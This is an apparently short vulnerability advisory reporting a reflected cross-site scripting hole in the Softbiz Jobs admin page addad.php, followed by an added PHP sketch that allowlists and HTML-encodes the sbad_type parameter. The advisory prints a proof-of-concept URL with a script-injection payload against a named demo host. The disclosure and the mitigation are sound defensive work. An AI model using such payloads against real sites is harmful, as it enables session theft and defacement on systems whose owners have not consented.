Text : Softbiz Jobs XSS Vulnerability
by
Pratul Agrawal
# Vulnerability found in: Insert New Banner module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Download http://www.softbizscripts.com/
# Script softbizscripts
# URL
http://demos1.softbiz.com/scripts/seojobs/admin/addad.php?sbad_type=top
# Proof of concept
...........................................................................
http://demos1.softbiz.com/scripts/seojobs/admin/addad.php?sbad_type=[XSS SCRIPT]
...........................................................................
Example-
...........................................................................
http://demos1.softbiz.com/scripts/seojobs/admin/addad.php?sbad_type="><script>alert(123)</script>
...........................................................................
# If you have any questions, comments, or concerns, feel free to contact me.
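
# Mitigation sketch (added example; not part of the original advisory and not Softbiz code)
The example payload closes a quoted attribute with "> before opening a script tag, so the sketch below allowlists sbad_type and HTML-encodes it on output. It assumes the value is echoed into a quoted HTML attribute; the hidden-field markup, the function names and the "bottom" value are hypothetical.

```php
<?php
// Added illustration: NOT the Softbiz Jobs source. Shows how a handler such as
// addad.php could treat sbad_type so the payload above stays inert.

// Assumption: the set of valid banner positions. Only "top" appears in the
// advisory; "bottom" is a constructed placeholder value.
const ALLOWED_AD_TYPES = ['top', 'bottom'];

/** Return the requested ad type if it is on the allowlist, else a default. */
function normalize_ad_type($raw, array $allowed = ALLOWED_AD_TYPES, string $default = 'top'): string
{
    // Arrays (?sbad_type[]=x) and missing values fall back to the default.
    if (!is_string($raw)) {
        return $default;
    }
    return in_array($raw, $allowed, true) ? $raw : $default;
}

/** Encode a value for use inside a quoted HTML attribute or element body. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render the (hypothetical) hidden form field that carries the ad type. */
function render_ad_type_field($raw): string
{
    // In the real handler $raw would come from $_GET['sbad_type'] ?? null.
    $type = normalize_ad_type($raw);
    return '<input type="hidden" name="sbad_type" value="' . h($type) . '">';
}

// Constructed inputs: the legitimate value and the advisory's example payload.
$samples = ['top', '"><script>alert(123)</script>'];
foreach ($samples as $s) {
    // Allowlist path: the payload is replaced by the default value.
    echo render_ad_type_field($s), PHP_EOL;
    // Encoding alone: quotes and angle brackets become entities, so the
    // value cannot close the attribute or open a tag.
    echo '<input type="hidden" name="sbad_type" value="' . h($s) . '">', PHP_EOL;
}
```

The allowlist is the primary control; the encoding step still matters wherever the parameter is echoed before validation, for instance in an error message.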